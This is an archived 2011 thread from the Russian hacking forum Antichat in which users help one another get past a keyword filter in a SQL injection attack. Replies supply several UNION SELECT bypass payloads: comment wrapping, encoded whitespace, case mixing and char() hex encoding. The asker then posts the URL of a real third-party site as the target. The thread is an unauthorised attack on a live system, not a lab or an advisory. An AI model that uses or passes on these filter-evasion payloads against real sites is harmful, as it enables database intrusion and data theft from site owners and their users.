Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Обход очень интересной фильтрации в SQL Inj (https://forum.antichat.xyz/showthread.php?t=302958)

Pirotexnik 13.11.2011 14:35

Добрый день.

Наткнулся на странную защиту. Там фильтруются ключевые слова и тэги. Причем крайне коряво, но удачно фильтруется слово SELECT

Можно как-то запрос

Код:

+union+select+1,2,3,4,5,6+--+
реализовать без select? Или же как-то закодировать его от фильтра?

Спасибо.

HAXTA4OK 13.11.2011 14:43

+union+/*!select*/+1,2,3,4,5,6+--+

+union+%0Aselect+1,2,3,4,5,6+--+

поробуй так

Pirotexnik 13.11.2011 14:50

увы, отфильтровало оба варианта...

Судя по всему там поиск по строке на совпадения.

Был, вроде, какой-то способ закодировать в хекс или base64, но я его не знаю, и не смог найти в гугле

p.s. А может можно вставить 1 символ чаром?

тоесть union+sel(char(101))ct+ ?

Это возможно? Как правильно?

aydin-ka 13.11.2011 14:52

+UnIoN+SeLeCt+1,2,3,4,5+--+

вместо + можно поставить %09 если ещё фильтруется "+"

Osstudio 13.11.2011 14:52

Вот как делают профессионалы:

Цитата:

Сообщение от None
?id=(1)and(1=0)union/*c*/select(1),2,3,4,5,6--


Pirotexnik 13.11.2011 14:57

Народ, вы не поняли...

В запросе просто ПОИСКОМ ищутся ключевые слова.

Поэтому везде, где есть select - срабатывает фильтр...

p.s. сканируется адресная строка, и только!

Если это обойти - дольше уже не вазникнет проблемм.

mailbrush 13.11.2011 15:01

Цитата:

Сообщение от Osstudio
Вот как делают профессионалы:

Osstudio, как всегда, отжигает

ТС, если идет тупо поиск подстроки - не обойдешь никак.

Фильтр может быть корявым, попробуй через POST отправить, но я сомневаюсь, что это сработает...

aydin-ka 13.11.2011 15:02

+union+char(0x73,0x65,0x6c,0x65,0x63,0x74)+1,2,3,4 ,5+--+

Osstudio 13.11.2011 15:05

Блин, Глебан, давай линк в студию, мы не ванги тут между прочим, ты ещё много-го не понимаешь, и по этому можешь ошибаться, ГОНИ ЛИНК!

Пробуй "WITHOUT UNION"

Цитата:

Сообщение от mailbrush
Osstudio, как всегда, отжигает

Ну а как же

Pirotexnik 13.11.2011 15:09

Цитата:

Сообщение от Osstudio
Блин, Глебан, давай линк в студию

Да, пап

http://lugbasket.org.ua/php/game.php?id=12

aydin-ka, твой вариант - вообще не отработал как запрос.

mailbrush, пост фильтруется, кукие - не используется.


Время: 00:21